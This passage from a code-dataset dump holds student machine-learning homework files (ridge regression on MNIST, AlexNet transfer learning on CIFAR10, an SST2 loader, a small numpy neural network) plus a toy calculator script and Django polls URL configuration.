len(labels_train_h)\n print(\"Train error: \", 1 - np.sum(labels_train_h == np.array(prediction_train)) / len(labels_train_h))\n\n\n # validation error\n prediction_val = model.predict(X_val_h)\n prediction_val = np.argmax(prediction_val, axis=0)\n val_errors[idx] = 1 - np.sum(val_labels == np.array(prediction_val)) / len(val_labels)\n print(\"Validation error: \", 1 - np.sum(val_labels == np.array(prediction_val)) / len(val_labels))\n\n\n\n idx += 1\n print(\"Training progress: \", idx, \"/\", len(ps), \" current p value:\", p)\n print(\"\")\n models.append(model)\n\n plotLearningCurve(train_errors, val_errors, ps, reg_lambda)\n\n print(\"best model index: \", np.argmin(val_errors))\n best_model = models[np.argmin(val_errors)]\n\n\n _, h_test = best_model.pFeature(X_train, X_test, new=False)\n prediction_test = best_model.predict(h_test)\n prediction_test = np.argmax(prediction_test, axis=0)\n test_error = 1 - np.sum(labels_test == np.array(prediction_test)) / len(labels_test)\n num_samples = len(X_test)\n num_correct = np.sum(labels_test == np.array(prediction_test))\n print(\"Test error : \", test_error)\n print(\"Confidence interval: \", hoeffding(num_samples, test_error))\n\n\n\n\n\n\n"
},
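The `hoeffding` helper above takes a `num_correct` argument it never uses and reads `test_error` from the enclosing scope instead. A self-contained sketch of the interval it is trying to compute, the two-sided Hoeffding bound around an empirical error measured on n samples (the function name is hypothetical):

```python
import math

def hoeffding_interval(err_hat, n, a=0.0, b=1.0, delta=0.05):
    # with probability >= 1 - delta, the true error lies within +/- half_width
    half_width = math.sqrt((b - a) ** 2 * math.log(2 / delta) / (2 * n))
    return err_hat - half_width, err_hat + half_width

print(hoeffding_interval(0.05, 10000))  # e.g. a 5% test error on 10k samples
```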
{
"alpha_fraction": 0.5992537140846252,
"alphanum_fraction": 0.6177611947059631,
"avg_line_length": 40.35185241699219,
"blob_id": "82bbc2f34f14cf6d43b396806eea452a3c4dddf7",
"content_id": "e15ec6da4415ec9dc6da65b9a5be61942e9daa1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6700,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 162,
"path": "/hw4/a4_transfer_learning/A4test.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#%%\n\nimport torch\nimport torchvision\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch import nn\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\n#%%\ndef train(model, train_loader, val_loader, split , gpu, lr = 1e-4, num_epochs = 20, criterion = nn.CrossEntropyLoss()):\n from tqdm import tqdm\n torch.cuda.set_device(gpu)\n model = model.cuda(gpu)\n # model = torch.nn.DataParallel(model).cuda(0)\n optimizer = torch.optim.Adam(model.parameters(), lr)\n log_train_loss = []\n log_val_loss = []\n log_val_acc = []\n for epoch in tqdm(range(num_epochs)):\n # training\n model.train() # if using batchnorm or dropout, use train mode setting! don't want to adjust normalization on non-train data\n epoch_train_loss = 0\n for batch_idx, (input, target) in enumerate(train_loader):\n input = input.cuda(gpu, non_blocking=True) # move to device and zero optimizer\n target = target.cuda(gpu, non_blocking=True)\n optimizer.zero_grad()\n ### train step ###\n output = model(input) # forward\n loss = criterion(output, target)\n ### end train step ###\n ### backward pass and optim step ###\n loss.backward()\n optimizer.step()\n ### logging\n epoch_train_loss += loss\n log_train_loss.append(epoch_train_loss / (batch_idx + 1))\n\n # evaluation\n model.eval() # set batchnorm + dropout in eval so it doesn't adjust on validation data\n with torch.no_grad(): # turn off gradients\n epoch_val_loss = 0\n num_correct = 0\n highest_val_acc = 0\n highest_val_acc_model = None\n for batch_idx, (input, target) in enumerate(val_loader):\n # do the same steps for train step as for val step but skip updates and backward pass (no gradients)\n input = input.cuda(gpu, non_blocking=True)\n target = target.cuda(gpu, non_blocking=True)\n # log val loss every val step\n output = model(input)\n loss = criterion(output, target)\n epoch_val_loss += loss\n # validation accuracy\n num_correct_per_batch = torch.sum(target == torch.argmax(output, axis=1))\n num_correct += num_correct_per_batch\n val_accuracy = num_correct.item() / split\n log_val_acc.append(val_accuracy)\n print(\"validation accuracy: \", val_accuracy)\n if val_accuracy > highest_val_acc:\n highest_val_acc = val_accuracy\n highest_val_acc_model = copy.deepcopy(model)\n log_val_loss.append(epoch_val_loss / (batch_idx + 1)) # average the loss\n return highest_val_acc_model, log_train_loss, log_val_loss, log_val_acc\n\ndef import_dataset():\n transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n train = torchvision.datasets.CIFAR10(\".\", train = True, transform = transform)\n val = torchvision.datasets.CIFAR10(\".\", train = True, transform = transform)\n test = torchvision.datasets.CIFAR10(\".\", train = False, transform = transform)\n return train, val, test\n#%% Data loader\n\ndef fixed_feature_alexnet():\n # model\n model = models.alexnet(pretrained=True)\n for param in model.parameters():\n param.require_grad = False\n model.classifier[6] = nn.Linear(4096, 10)\n return model\n\n#%%\n\n\n#%% Train vs Validation\ndef eval_test_acc(model, M, test_loader, gpu):\n num_correct = 0\n with torch.no_grad():\n for batch_idx, (input, target) in enumerate(test_loader):\n input = input.cuda(gpu, non_blocking= True)\n target = target.cuda(gpu, non_blocking= True)\n output = model(input)\n num_correct_per_batch = torch.sum(target == torch.argmax(output, axis=1))\n 
num_correct += num_correct_per_batch\n return num_correct.item()/M\n\ndef report(name, loss1, loss2, val_acc_l, test_acc):\n plt.plot(loss1, label = \"Train Loss\")\n plt.plot(loss2, label = \"Validation loss\")\n plt.xlabel(\"epoch\")\n plt.ylabel(\"loss\")\n plt.legend()\n plt.savefig(name)\n fname = name + \".txt\"\n with open(fname, \"w\") as f:\n txt = \"Highest validation accuracy: \" + str(max(val_acc_l)) + \"\\n\"\n txt += \"Final test accuracy: \" + str(test_acc)\n f.write(txt)\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=int, default=1, help=\"1 is transfer learning, 2 is fine tuning\")\n parser.add_argument(\"--num_epochs\", type=int, default=20)\n parser.add_argument(\"--gpu\", type=int, default=0)\n args = parser.parse_args()\n\n\n CIFAR10_train, CIFAR10_val, CIFAR10_test = import_dataset()\n\n val_ratio = 0.1\n N = len(CIFAR10_train)\n M = len(CIFAR10_test)\n np.random.seed(10)\n idx = np.random.randint(0, N, size = N)\n split = int(N * val_ratio)\n train_idx, val_idx = idx[split:], idx[:split]\n train_sampler = SubsetRandomSampler(train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n\n num_of_classes = 10\n lr = 0.05\n batch_size = 32\n criterion = nn.CrossEntropyLoss()\n\n val_ratio = 0.1 #\n train_loader = torch.utils.data.DataLoader(CIFAR10_train, batch_size = batch_size, sampler = train_sampler)\n val_loader = torch.utils.data.DataLoader(CIFAR10_train, batch_size = batch_size, sampler = val_sampler)\n test_loader = torch.utils.data.DataLoader(CIFAR10_test, batch_size = 100)\n\n if args.model == 1:\n model1 = fixed_feature_alexnet()\n model1, log_train_loss1, log_val_loss1, log_val_acc1 = train(model1, train_loader, val_loader, split, gpu = args.gpu, num_epochs= args.num_epochs)\n #%%\n test_acc1 = eval_test_acc(model1, M, test_loader, gpu = args.gpu)\n report(\"A4a Transfer Learning\", log_train_loss1, log_val_loss1, log_val_acc1, test_acc1)\n elif args.model == 2:\n #%% Model2: Fine tuning\n model2 = models.alexnet(pretrained=True)\n model2.classifier[6] = nn.Linear(4096, 10)\n model2, log_train_loss2, log_val_loss2, log_val_acc2 = train(model2, train_loader, val_loader, split, gpu = args.gpu, num_epochs= args.num_epochs)\n test_acc2 = eval_test_acc(model2, M, test_loader, gpu = args.gpu)\n report(\"A4b fine tuning\", log_train_loss2, log_val_loss2, log_val_acc2, test_acc2)\n else:\n print(\"wrong model argument, it's either 1 or 2\")\n\n"
},
{
"alpha_fraction": 0.5877413749694824,
"alphanum_fraction": 0.5927791595458984,
"avg_line_length": 30.760000228881836,
"blob_id": "87eb21fbabb431ed838f2fe382ebaeed265c7c3b",
"content_id": "45b6e3ff035a0ffad98a0c99c473010533de2644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4764,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 150,
"path": "/hw4/a6_RNN/util.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.utils.data import Dataset\n\nimport os\nimport pickle\nimport csv\n\nfrom collections import Counter\n\n\ndef load_embedding_matrix(vocab, glove_file_path=\"glove.6B.50d.txt\"):\n embedding_dim = -1\n\n embeddings = {}\n\n with open(glove_file_path, \"r\", encoding=\"utf8\") as f:\n for token_embedding in f.readlines():\n token, *embedding = token_embedding.strip().split(\" \")\n\n if token not in vocab:\n continue\n\n embedding = torch.tensor([float(e) for e in embedding], dtype=torch.float32)\n\n assert token not in embeddings\n assert embedding_dim < 0 or embedding_dim == len(embedding)\n\n embeddings[token] = embedding\n embedding_dim = len(embedding)\n\n all_embeddings = torch.stack(list(embeddings.values()), dim=0)\n\n embedding_mean = all_embeddings.mean()\n embedding_std = all_embeddings.std()\n\n # Randomly initialize embeddings\n embedding_matrix = torch.normal(embedding_mean, embedding_std, size=(len(vocab), embedding_dim))\n\n # Overwrite the embeddings we get from GloVe. The ones we don't find are left randomly initialized.\n for token, embedding in embeddings.items():\n embedding_matrix[vocab[token], :] = embedding\n\n # The padding token is explicitly initialized to 0.\n embedding_matrix[vocab[\"[pad]\"]] = 0\n\n return embedding_matrix\n\n\nclass SST2Dataset(Dataset):\n def __init__(self, path, vocab=None, reverse_vocab=None):\n super().__init__()\n\n sentences = []\n labels = []\n\n with open(path, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quoting=csv.QUOTE_NONE)\n next(reader) # Ignore header\n for row in reader:\n # Each row contains a sentence and label (either 0 or 1)\n sentence, label = row\n sentences.append(sentence.strip().split(\" \"))\n labels.append([int(label)])\n\n # Vocab maps tokens to indices\n if vocab is None:\n vocab = self._build_vocab(sentences)\n reverse_vocab = None\n\n # Reverse vocab maps indices to tokens\n if reverse_vocab is None:\n reverse_vocab = {index: token for token, index in vocab.items()}\n\n self.vocab = vocab\n self.reverse_vocab = reverse_vocab\n\n indexed_sentences = [torch.tensor(self.tokens_to_indices(sentence)) for sentence in sentences]\n labels = torch.tensor(labels)\n\n self.sentences = indexed_sentences\n self.labels = labels\n\n def __getitem__(self, index):\n return self.sentences[index], self.labels[index]\n\n def __len__(self):\n return len(self.sentences)\n\n @staticmethod\n def _build_vocab(sentences, unk_cutoff=1, vocab_file_path=\"vocab.pkl\"):\n # Load cached vocab if existent\n if os.path.exists(vocab_file_path):\n with open(vocab_file_path, \"rb\") as f:\n return pickle.load(f)\n\n word_counts = Counter()\n\n # Count unique words (lower case)\n for sentence in sentences:\n for token in sentence:\n word_counts[token.lower()] += 1\n\n # Special tokens: padding, beginning of sentence, end of sentence, and unknown word\n vocab = {\"[pad]\": 0, \"[unk]\": 1}\n token_id = 2\n\n # Assign a unique id to each word that occurs at least unk_cutoff number of times\n for token, count in word_counts.items():\n if count >= unk_cutoff:\n vocab[token] = token_id\n token_id += 1\n\n # Cache vocab\n with open(vocab_file_path, \"wb\") as f:\n pickle.dump(vocab, f, pickle.HIGHEST_PROTOCOL)\n\n return vocab\n\n def tokens_to_indices(self, tokens):\n \"\"\"\n Converts tokens to indices.\n :param tokens: A list of tokens (strings)\n :return: A tensor of shape (n, 1) containing the token indices\n \"\"\"\n indices = []\n\n unk_token = self.vocab[\"[unk]\"]\n\n for token in tokens:\n 
indices.append(self.vocab.get(token.lower(), unk_token))\n\n return torch.tensor(indices)\n\n def indices_to_tokens(self, indices):\n \"\"\"\n Converts indices to tokens and concatenates them as a string.\n :param indices: A tensor of indices of shape (n, 1), a list of (1, 1) tensors or a list of indices (ints)\n :return: The string containing tokens, concatenated by a space.\n \"\"\"\n tokens = []\n\n for index in indices:\n if torch.is_tensor(index):\n index = index.item()\n token = self.reverse_vocab.get(index, \"[unk]\")\n if token == \"[pad]\":\n continue\n tokens.append(token)\n\n return \" \".join(tokens)\n"
},
{
"alpha_fraction": 0.5821157097816467,
"alphanum_fraction": 0.6054938435554504,
"avg_line_length": 26.813007354736328,
"blob_id": "7d5badb02a9f8c4fd1a6123d6fa4659e9c40cf82",
"content_id": "6a68dd2ba5930e6d0df7c9a097573baed37511cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 123,
"path": "/CSE546hw2/multinomial_logistic_reg.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[101]:\n\n\nfrom mnist import MNIST\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom matplotlib import pyplot as plt\n\n\n# In[102]:\n\n\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train/255.0\n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\nX_train = torch.from_numpy(X_train).float().cuda()\ny_train = torch.from_numpy(labels_train).long().cuda()\nX_test = torch.from_numpy(X_test).float().cuda()\ny_test = torch.from_numpy(labels_test).long().cuda()\n\n\n# In[124]:\n\n\nn, d = X_train.shape\nm = X_test.shape[0]\n\n\n# In[125]:\n\n\ndef train(X_train, y_train, X_test, y_test, reg = None, step_size = 0.01, stop = 1e-4):\n class_rate_train_l = []\n class_rate_test_l = []\n epochs = 50\n W = torch.zeros(784, 10, device = 0 , requires_grad= True).float()\n# step_size = 0.01\n n = y_train.shape[0]\n k = 10 # number of classes\n y_train_onehot = torch.FloatTensor(n, k).zero_().cuda()\n y_train_onehot.scatter_(1, y_train.unsqueeze(-1).long(), 1)\n W_update = torch.tensor([1])\n with torch.cuda.device(0):\n while W_update > stop: # TODO: converge condition\n if reg == \"ridge\":\n y_hat = torch.matmul(X_train, W)\n criterion = torch.nn.MSELoss()\n loss = criterion(y_hat, y_train_onehot)\n elif reg == \"logistics\":\n y_hat = torch.matmul(X_train, W)\n loss = F.cross_entropy(y_hat, y_train)\n else:\n assert reg == None, \"needs regression type\"\n\n \n loss.backward()\n W.data = W.data - step_size * W.grad\n W_update = torch.norm(step_size * W.grad, p = 2)\n\n y_pred_train = torch.argmax(torch.matmul(X_train, torch.matmul(W, torch.eye(10).cuda())), axis = 1)\n y_pred_test = torch.argmax(torch.matmul(X_test, torch.matmul(W, torch.eye(10).cuda())), axis = 1)\n class_rate_train = torch.sum(y_pred_train ==y_train).item()/n\n class_rate_test = torch.sum(y_pred_test == y_test).item()/m\n class_rate_train_l.append(class_rate_train)\n class_rate_test_l.append(class_rate_test)\n # print(\"W.grad: \", W.grad)\n print(\"W_update: \", W_update)\n\n\n W.grad.zero_()\n return class_rate_train_l, class_rate_test_l\n\n\n# In[126]:\n\n\nclass_rate_train_l1, class_rate_test_l1 = train(X_train, y_train, X_test, y_test, reg = \"ridge\")\n\n\n# In[127]:\n\n\nclass_rate_train_l2, class_rate_test_l2 = train(X_train, y_train, X_test, y_test, reg = \"logistics\")\n\n\n# In[128]:\n\n\nclass_rate_train_l1\n\n\n# In[130]:\n\n\nxs = range(len(mis_class_rate_train_l1))\nplt.plot(xs, class_rate_train_l1, label = \"train\")\nplt.plot(xs, class_rate_test_l1, label= \"test\")\nplt.legend()\nplt.xlabel(\"number of iterations\")\nplt.ylabel(\"accuracy\")\nplt.title(\"ridge regression\")\nplt.savefig(\"B4c1\")\nplt.show()\n\n\nxs = range(len(mis_class_rate_train_l2))\nplt.plot(xs, class_rate_train_l2, label = \"train\")\nplt.plot(xs, class_rate_test_l2, label= \"test\")\nplt.xlabel(\"number of iterations\")\nplt.ylabel(\"accuracy\")\nplt.legend()\nplt.title(\"logistics regression\")\nplt.savefig(\"B4c2\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.625094473361969,
"alphanum_fraction": 0.6402116417884827,
"avg_line_length": 35.77777862548828,
"blob_id": "eaa5b31fe4c1d3b7610eac5dfb0f28e1e189aa68",
"content_id": "dd94a005ffc998d7cf4aecc9050ccaa9e0729538",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 36,
"path": "/hw1/ridgeRegression/imageClassify.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "from mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train/255.0\n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\ndef predict(w, x):\n predictions = np.eye(10).T.dot(w.T).dot(x.T)\n return predictions\n\n\n\n\ndef train(X, X_labels, reg_lambda = 0):\n # TODO: polyfeature + normalization?\n\n n = X.shape[1]\n Y = np.eye(10)[X_labels]\n w = np.linalg.pinv(X.T.dot(X) + np.multiply(reg_lambda, np.eye(n))).dot(X.T).dot(Y)\n # w = np.linalg.pinv(X.T.dot(X) + np.multiply(reg_lambda,np.eye(n)) ).dot(X.T).dot(Y)\n return w\n\n\nif __name__ == '__main__':\n X_train, labels_train, X_test, labels_test = load_dataset()\n reg_lambda = 1e-4\n w = train(X_train, labels_train, reg_lambda)\n prediction_train = predict(w, X_train)\n prediction_train = np.argmax(prediction_train, axis=0)\n print(\"Train error: \", 1-np.sum(labels_train == np.array(prediction_train))/len(labels_train))\n prediction_test = predict(w, X_test)\n prediction_test = np.argmax(prediction_test, axis=0)\n print(\"Test error: \", 1-np.sum(labels_test == np.array(prediction_test))/len(labels_test))"
}
] | 11 |
chrysaor/jw_mnist | https://github.com/chrysaor/jw_mnist | 75bd216b3dc2ae514eb6292ed4f7145e2f0dde91 | bf7af203b71ac3cc347ebc9cad2939d35e9811aa | 709362220f52c34c2cfde24b17c79f47dec42d81 | refs/heads/master | 2020-09-10T23:27:56.247688 | 2019-11-15T07:26:12 | 2019-11-15T07:26:12 | 221,864,959 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7068702578544617,
"alphanum_fraction": 0.7114503979682922,
"avg_line_length": 15.79487133026123,
"blob_id": "34fc3e333676d6510e7c8d24d9d7e004cd676d0b",
"content_id": "bef0a4fdfece370fa9f667f988f92d3701bbbedc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 39,
"path": "/README.md",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "# Neural network study example\n\n### Summary\n\nStudy example\n\n```\n$ !Download mnist train data from web site!\n$ cd jw_mnist\n$ python3 -m venv venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n$ jupyter notebook\n$ Load notebook file in notebook app\n```\n\n### Requirements\n\n- mnist_train data : https://pjreddie.com/media/files/mnist_train.csv\n- mnist_test data : https://pjreddie.com/media/files/mnist_test.csv\n- matplotlib : stable\n- numpy : stable\n- scipy : stable\n- jupyterlab : stable\n\n\n### Execution\n\n1. Move to source directory\n\n```\n$ cd neural_network\n```\n\n2. Execute jupyter notebook and load notebook file\n\n```\n$ jupyter notebook\n```\n"
},
{
"alpha_fraction": 0.5936749577522278,
"alphanum_fraction": 0.6036829352378845,
"avg_line_length": 33.21917724609375,
"blob_id": "ee6a14a1fa649cb2fac3507f2623b1110fc9bb5b",
"content_id": "1b9187010530722aabf1ca0ded81f09ead86b885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3136,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 73,
"path": "/neural_network/neural_network.py",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "import numpy\nimport scipy.special\n\n\n# 신경망 클래스 정의\nclass NeuralNetwork:\n\n # 신경망 초기화\n def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n # 입력, 은닉, 출력 계층의 노드 개수 설정\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # 가중치 행렬 wih, who\n # 배열 내 가중치는 w_i_j로 표기. 노드 i에서 다음 계층의 노드 j로 연결됨\n # w11 w21\n # w12 w22\n self.wih = numpy.random.normal(0.0, pow(self.hidden_nodes, -0.5), (self.hidden_nodes, self.input_nodes))\n self.who = numpy.random.normal(0.0, pow(self.output_nodes, -0.5), (self.output_nodes, self.hidden_nodes))\n\n # 학습률\n self.learning_rate = learning_rate\n\n # 활성화 함수로 시그모이드 함수를 이용\n self.activation_function = lambda x: scipy.special.expit(x)\n\n # 신경망 학습시키기\n def train(self, inputs_list, targets_list):\n # 입력 리스트를 2차원 행렬로 변환\n inputs = numpy.array(inputs_list, ndmin=2).T\n targets = numpy.array(targets_list, ndmin=2).T\n\n # 은닉 계층으로 들어오는 신호를 계산\n hidden_inputs = numpy.dot(self.wih, inputs)\n # 은닉 계층에서 나가는 신호를 계산\n hidden_outputs = self.activation_function(hidden_inputs)\n\n # 최종 출력 계층으로 들어오는 신호를 계산\n final_inputs = numpy.dot(self.who, hidden_outputs)\n # 최종 출력 계층에서 나가는 신호를 계산\n final_outputs = self.activation_function(final_inputs)\n\n # 오차는 (실제 값 - 계산 값)\n output_errors = targets - final_outputs\n # 은닉 계층의 오차는 가중치에 의해 나뉜 출력 계층의 오차들을 재조합해 계산\n hidden_errors = numpy.dot(self.who.T, output_errors)\n\n # 은닉 계층과 출력 계층 간의 가중치 업데이트\n self.who += self.learning_rate * numpy.dot(\n (output_errors * final_outputs * (1.0 - final_outputs)), numpy.transpose(hidden_outputs)\n )\n\n # 입력 계층과 은닉 계층 간의 가중치 업데이트\n self.wih += self.learning_rate * numpy.dot(\n (hidden_errors * hidden_outputs * (1.0 - hidden_outputs)), numpy.transpose(inputs)\n )\n\n # 신경망 질의하기\n def query(self, inputs_list):\n # 입력 리스트를 2차원 행렬로 변환\n inputs = numpy.array(inputs_list, ndmin=2).T\n\n # 은닉 계층으로 들어오는 신호를 계산\n hidden_inputs = numpy.dot(self.wih, inputs)\n # 은닉 계층으로 나가는 신호를 계산\n hidden_outputs = self.activation_function(hidden_inputs)\n # 최종 출력 계층으로 들어오는 신호를 계산\n final_inputs = numpy.dot(self.who, hidden_outputs)\n # 최종 출력 계층에서 나가는 신호를 계산\n final_outputs = self.activation_function(final_inputs)\n\n return final_outputs\n"
},
{
"alpha_fraction": 0.6561679840087891,
"alphanum_fraction": 0.6719160079956055,
"avg_line_length": 33.6363639831543,
"blob_id": "ddf063ee8b2f71cda992df0475137e32cf6843db",
"content_id": "fe9d887d75d5ca54ee4099a2cd2c5b6cab58d409",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 381,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 11,
"path": "/main.py",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "import numpy\nimport matplotlib.pyplot\n\nif __name__ == 'main':\n train_data_file = open('mnist_data/mnist_train.csv', 'r')\n data_list = train_data_file.readlines()\n train_data_file.close()\n\n all_values = data_list[0].split(',')\n image_array = numpy.asfarray(all_values[1:]).reshape((28, 28))\n matplotlib.pyplot.imshow(image_array, cmap='Greys', interpolation=None)\n"
}
] | 3 |
cu-swe4s-fall-2019/version-control-jfgugel | https://github.com/cu-swe4s-fall-2019/version-control-jfgugel | 1b42b19695b265cee1191cef6fa1c244879f82ff | 38b1f0c8b04d66a0f10a06a05642a6965502ad72 | c54dbafa65ec30285fdc2a9fab088bd994a81b33 | refs/heads/master | 2020-07-14T02:11:53.531688 | 2019-09-05T18:04:23 | 2019-09-05T18:04:23 | 205,209,961 | 0 | 0 | MIT | 2019-08-29T16:52:45 | 2019-09-03T17:25:48 | 2019-09-05T18:04:24 | Python | [
{
"alpha_fraction": 0.42465752363204956,
"alphanum_fraction": 0.4452054798603058,
"avg_line_length": 15.11111068725586,
"blob_id": "718f61d1c0b4f795438ad546414ee409d7a19bfb",
"content_id": "4e7ea0b97174bd3962f3ab954adf8a54794a2590",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 9,
"path": "/math_lib.py",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "def div(a, b):\n if b==0:\n print (\"Can't divide by 0\")\n return 1\n else:\n return a/b\n \ndef add(a, b):\n return a+b\n\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 50.75,
"blob_id": "820cc6da7ec4a59474f58e86b503b95f1ac1312a",
"content_id": "030933296efa50417e036bb9055dcee23e8264ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 208,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 4,
"path": "/README.md",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "# version_control\nGet familiar with version control basics\nmath_lib.py has a function that allows you to divide one number by another and allows to add two numbers\ncalculate.py allows you to add two numbers \n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 10,
"blob_id": "fbfca69a931ea30248584ce73c4673dea1818c7f",
"content_id": "c166d2729b607ee3b3c8205fc2ac7f4f4785e27c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nchmod -x run.sh\n\npython3 calculate.py 3 4\n\n"
},
{
"alpha_fraction": 0.6532109975814819,
"alphanum_fraction": 0.6642201542854309,
"avg_line_length": 26.299999237060547,
"blob_id": "337346df565ca6708e8579e36488e788ace4a6ed",
"content_id": "9921a03df46af81e55d90108d567df52c059c181",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 20,
"path": "/calculate.py",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "import math_lib as mathfunctions\nimport argparse\n\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='take input from terminal') \n parser.add_argument('first_value', type=int, help='first integer to be added') \n parser.add_argument('second_value', type=int, help='second integer to be added')\n \n args = parser.parse_args()\n a= args.first_value\n b= args.second_value\n \n answer1 = mathfunctions.add(a,b)\n answer2 = mathfunctions.div(answer1,3)\n\n print(answer1)\n print(answer2)"
}
] | 4 |
drewUCL/DjangoPolls | https://github.com/drewUCL/DjangoPolls | 17293df98ba19ca5737234cd56ae32ef1c51bc6e | 7758d1cecb115e85017011423d19f1e3483c013f | 4f06701a5d7a4f09bc80eb1e15d3bcc7ca9d9c66 | refs/heads/master | 2021-01-10T12:18:52.791396 | 2016-01-25T15:32:32 | 2016-01-25T15:32:32 | 50,359,864 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5903890132904053,
"alphanum_fraction": 0.6075515151023865,
"avg_line_length": 30.25,
"blob_id": "b9a695015dbe95ea2ec5dce0c4e22766289d6f70",
"content_id": "db9dde5ae3d62341d4aed3d071182b1b14c9b9a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 874,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 28,
"path": "/polls/urls.py",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name='polls' #this allows reference like: <a href=\"{% url 'polls:detail' question.id %}\"> in the index.html (template)\n\n\n'''\nurlpatterns = [\n\t# ex: /polls/\n\turl(r'^$',views.index, name=\"index\"),\n\t# ex: /polls/5/\n\turl(r'^(?P<question_id>[0-9]+)/$',views.detail, name=\"detail\"),\n\t# ex: /polls/5/results\n\turl(r'^(?P<question_id>[0-9]+)/results/$', views.results, name='results'),\n\t# ex: /polls/5/vote\n\turl(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]\n'''\n\n#Now using the django generic templates\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^(?P<pk>[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]"
},
{
"alpha_fraction": 0.7273055911064148,
"alphanum_fraction": 0.735985517501831,
"avg_line_length": 30.375,
"blob_id": "5d2d4b89458ba5fccd37e09a2019bbedc93989f1",
"content_id": "2a058aa24f53218396683b9c416f4600e25e3dfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 88,
"path": "/polls/views.py",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
